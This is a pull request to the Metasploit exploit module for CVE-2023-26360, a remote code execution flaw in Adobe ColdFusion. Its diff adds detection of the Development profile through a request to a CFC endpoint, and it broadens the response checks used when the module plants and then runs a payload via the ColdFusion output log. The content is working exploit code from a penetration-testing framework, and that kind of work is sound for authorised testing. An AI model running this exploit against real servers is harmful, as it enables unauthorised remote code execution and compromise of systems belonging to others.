### PR TITLE
Bug fix for issue 18237 (CVE-2023-26360 against ColdFusion deployed in a Development profile)

### DIFF
--- a/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb
+++ b/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb
@@ -136,6 +136,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Unknown('Connection failed') unless res
 
+    # If ColdFusion is deployed with the Development profile (rather than Production) we will get a directory listing
+    # returned for the first request. We can detect that here and send a second request to a CFC endpoint that we
+    # know will return a ColdFusion cookie.
+    if res.code == 200 && res.body.include?('<title>Directory Listing For [/]</title>')
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => '/CFIDE/componentutils/cfcexplorer.cfc'
+      )
+
+      return CheckCode::Unknown('Connection failed') unless res
+    end
+
     # We cannot identify the ColdFusion version through a generic technique. Instead we use the Recog fingerprint
     # to match a ColdFusion cookie, and use this information to detect ColdFusion as being present.
     # https://github.com/rapid7/recog/blob/main/xml/http_cookies.xml#L69
@@ -301,7 +313,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => { '_variables' => "{#{cfc_payload}" }
     )
 
-    unless res && res.code == 200 && res.body.include?('<title>Error</title>')
+    # For Coldfusion deployed with the Development profile, success here will be a 500 error with a known title tag in
+    # the body. For Production profiles, success here will be a 200 response code and a different known title tag in
+    # the body.
+    unless res && ((res.code == 200 && res.body.include?('<title>Error</title>')) || ((res.code == 404 || res.code == 500) && res.body.include?('<title>Error Occurred While Processing Request</title>')))
       fail_with(Failure::UnexpectedReply, 'Failed to plant the payload in the ColdFusion output log file')
     end
 
@@ -333,7 +348,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => vars_post
     )
 
-    unless res && res.code == 200 && res.body.include?('<title>Error</title>')
+    unless res && ((res.code == 200 && res.body.include?('<title>Error</title>')) || ((res.code == 404 || res.code == 500) && res.body.include?('<title>Error Occurred While Processing Request</title>')))
       fail_with(Failure::UnexpectedReply, 'Failed to execute the payload in the ColdFusion output log file')
     end
   end


### PR DESCRIPTION
This pull request resolves an issue in the exploit module `modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb` as found in issue #18237.

ColdFusion deployed with a Development profile behaves slightly differently than ColdFusion deployed in a Production profile, so we need to test for some different return values during exploitation.
